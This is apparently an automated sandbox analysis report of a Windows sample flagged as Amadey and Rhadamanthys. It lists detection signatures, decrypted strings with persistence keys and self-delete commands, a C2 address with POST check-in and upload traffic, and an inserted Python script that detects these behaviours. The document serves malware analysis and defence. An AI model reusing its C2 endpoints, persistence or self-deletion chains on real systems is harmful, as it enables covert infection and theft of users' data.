Windows Analysis Report
J2NWKU2oJi.exe

Overview

General Information

Sample name: J2NWKU2oJi.exe
Renamed because the original name is a hash value.
Original sample name: 9e64b65535e29ec152642d8bdcb22974.exe
Analysis ID: 1425696
MD5: 9e64b65535e29ec152642d8bdcb22974
SHA1: 5431aa7526ba193c0a92afffe2537bc54f51a0ba
SHA256: 6586cb8766c14a87330bf6c79a7cbd7cbff3ca9da63574a9c348645117d08f14
Tags: 32, exe, trojan

Detection

Amadey, RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution:
  • Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Avira: detection malicious, Label: HEUR/AGEN.1319380
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Avira: detection malicious, Label: HEUR/AGEN.1319380
Source: 22.2.Yuem.exe.ce0000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": "91.202.233.180/g88sks2SaM/index.php", "Version": "4.19"}
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Virustotal: Detection: 52%
Source: J2NWKU2oJi.exe Virustotal: Detection: 20%
Source: J2NWKU2oJi.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif Joe Sandbox ML: detected
Source: J2NWKU2oJi.exe Joe Sandbox ML: detected
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 91.202.233.180
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: /g88sks2SaM/index.php
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: S-%lu-
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ccbfb9d50e
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Dctooux.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Startup
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: rundll32
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Programs
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: %USERPROFILE%
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: http://
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: https://
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: /Plugins/
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: &unit=
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: shell32.dll
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: kernel32.dll
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: GetNativeSystemInfo
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ProgramData\
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: AVAST Software
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Kaspersky Lab
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Panda Security
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Doctor Web
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 360TotalSecurity
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Bitdefender
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Norton
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Sophos
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Comodo
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: WinDefender
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 0123456789
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ------
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ?scr=1
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ComputerName
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: -unicode-
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: VideoID
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: ProductName
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: CurrentBuild
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: rundll32.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: "taskkill /f /im "
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: " && timeout 1 && del
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: && Exit"
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: " && ren
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: Powershell.exe
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: shutdown -s -t 0
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: random
Source: 22.2.Yuem.exe.ce0000.0.unpack String decryptor: 5sXe3T
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637FF7C CryptUnprotectData, 20_3_00007DF4B637FF7C
Source: J2NWKU2oJi.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: J2NWKU2oJi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000010.00000003.2202969812.0000000005050000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2202662446.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000010.00000003.2203315691.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203489715.0000000005000000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbTSw source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000014.00000002.2583277853.000001BD75908000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000010.00000003.2203876549.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000010.00000003.2203713237.0000000004E60000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00406873 FindFirstFileW,FindClose, 0_2_00406873
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C49
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388E20 GetLogicalDriveStringsW, 20_3_00007DF4B6388E20
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 20_3_00007DF4B638BFA1
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 20_2_000001BD75700511
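The decrypted strings above spell out how the Amadey loader behaves on the host: it sleeps with ping (cmd.exe spawning ping -n 5 127.0.0.1), persists through the Run and RunOnce keys and the Startup folder, drops into AppData\Local\Temp\<10 hex characters>\ (ccbfb9d50e\Dctooux.exe), runs scripts with Powershell.exe -executionpolicy remotesigned -File, cleans up with cmd /C RMDIR /s/q and removes the original dropper with a taskkill /f /im ... && timeout 1 && del ... && Exit chain. The Python below is an added triage example, not part of the Joe Sandbox report and not Amadey code, that scores process-creation records against exactly those strings; the event records are constructed in a simplified Sysmon Event ID 1 shape, and the rule names, weights and threshold are assumptions made for illustration.

```python
"""Triage of Windows process-creation events against the Amadey host behaviour
documented in this report (ping-as-sleep, taskkill/timeout/del self-delete chain,
RMDIR cleanup, PowerShell -executionpolicy remotesigned -File, and the
AppData\\Local\\Temp\\<10 hex>\\<name>.exe drop path).

Added example, not part of the Joe Sandbox report and not Amadey code. The event
records are constructed in a simplified Sysmon Event ID 1 shape; rule names,
weights and the threshold are assumptions for illustration.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]  # Image, ParentImage, CommandLine, ProcessId, ParentProcessId

# (rule name, pattern over CommandLine, weight)
RULES: List[Tuple[str, re.Pattern, int]] = [
    # Report: "Uses ping.exe to sleep"; cmd.exe -> PING.EXE ping -n 5 127.0.0.1
    ("ping_loopback_sleep",
     re.compile(r"\bping(\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\b", re.I), 2),
    # Decrypted strings: "taskkill /f /im " ... " && timeout 1 && del" ... "&& Exit"
    ("cmd_self_delete_chain",
     re.compile(r"taskkill\s+/f\s+/im\s+.*&&\s*timeout\s+1\s*&&\s*del\b", re.I), 4),
    # Decrypted string: "cmd /C RMDIR /s/q"
    ("cmd_rmdir_cleanup", re.compile(r"\bRMDIR\s+/s\s*/q\b", re.I), 1),
    # Decrypted strings: "Powershell.exe" and '-executionpolicy remotesigned -File "'
    ("powershell_remotesigned_file",
     re.compile(r'-executionpolicy\s+remotesigned\s+-File\s+"', re.I), 2),
]

# Drop location seen in the report: ...\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
DROP_PATH = re.compile(r"\\AppData\\Local\\Temp\\[0-9a-f]{10}\\[^\\]+\.exe$", re.I)


def score_event(ev: Event) -> Tuple[int, List[str]]:
    """Return (score, matched rule names) for one process-creation event."""
    score, hits = 0, []
    cmd = ev.get("CommandLine", "")
    for name, pattern, weight in RULES:
        if pattern.search(cmd):
            hits.append(name)
            score += weight
    for field in ("Image", "ParentImage"):
        if DROP_PATH.search(ev.get(field, "")):
            hits.append("temp_hexdir_" + field.lower())
            score += 3
    return score, hits


def triage(events: List[Event], threshold: int = 3) -> List[Tuple[str, int, List[str]]]:
    """Aggregate child scores under each ParentProcessId and return the parents whose
    children together reach the threshold, highest score first. A lone ping-as-sleep
    (weight 2) stays below the default threshold on purpose: it is common in
    legitimate batch files."""
    totals: Dict[str, Tuple[int, List[str]]] = {}
    for ev in events:
        score, hits = score_event(ev)
        if not hits:
            continue
        parent = ev.get("ParentProcessId", "?")
        prev_score, prev_hits = totals.get(parent, (0, []))
        totals[parent] = (prev_score + score, prev_hits + hits)
    flagged = [(pid, s, h) for pid, (s, h) in totals.items() if s >= threshold]
    return sorted(flagged, key=lambda t: -t[1])


# Constructed events (not the report's process tree). Events 2 and 3 are children of
# the dropped loader; events 4 and 5 are benign look-alikes.
SAMPLE_EVENTS: List[Event] = [
    {"ProcessId": "4120", "ParentProcessId": "3990",
     "Image": r"C:\Windows\SysWOW64\PING.EXE", "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": "ping -n 5 127.0.0.1"},
    {"ProcessId": "3988", "ParentProcessId": "2200",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe",
     "CommandLine": r'cmd /C RMDIR /s/q "C:\Users\user\AppData\Local\Temp\dropped_dir"'},
    {"ProcessId": "5100", "ParentProcessId": "2200",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe",
     "CommandLine": r'cmd /C "taskkill /f /im "J2NWKU2oJi.exe" && timeout 1 && del "C:\Users\user\Desktop\J2NWKU2oJi.exe" && Exit"'},
    {"ProcessId": "6000", "ParentProcessId": "800",
     "Image": r"C:\Windows\System32\PING.EXE", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "ping -n 4 10.0.0.1"},
    {"ProcessId": "6100", "ParentProcessId": "800",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"pwsh -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for pid, score, hits in triage(SAMPLE_EVENTS):
        print(f"parent {pid}: score {score}, hits {hits}")
```

Aggregating by parent rather than scoring events in isolation is what makes the self-delete chain and the RMDIR cleanup reinforce each other under the dropped loader, while a lone loopback ping in a batch file stays under the threshold.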

Networking

Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49736
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49738
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49739
Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49740 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49741 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49743 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49747 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49748 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49752 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49754 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49757 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49760 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49763 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49767 -> 91.202.233.180:80
Source: Traffic Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49769 -> 91.202.233.180:80
Source: Malware configuration extractor IPs: 91.202.233.180
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: global traffic TCP traffic: 192.168.2.4:49736 -> 94.156.10.37:2036
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODkwNDc=Host: 91.202.233.180Content-Length: 89199Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTI0NDU=Host: 91.202.233.180Content-Length: 92597Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
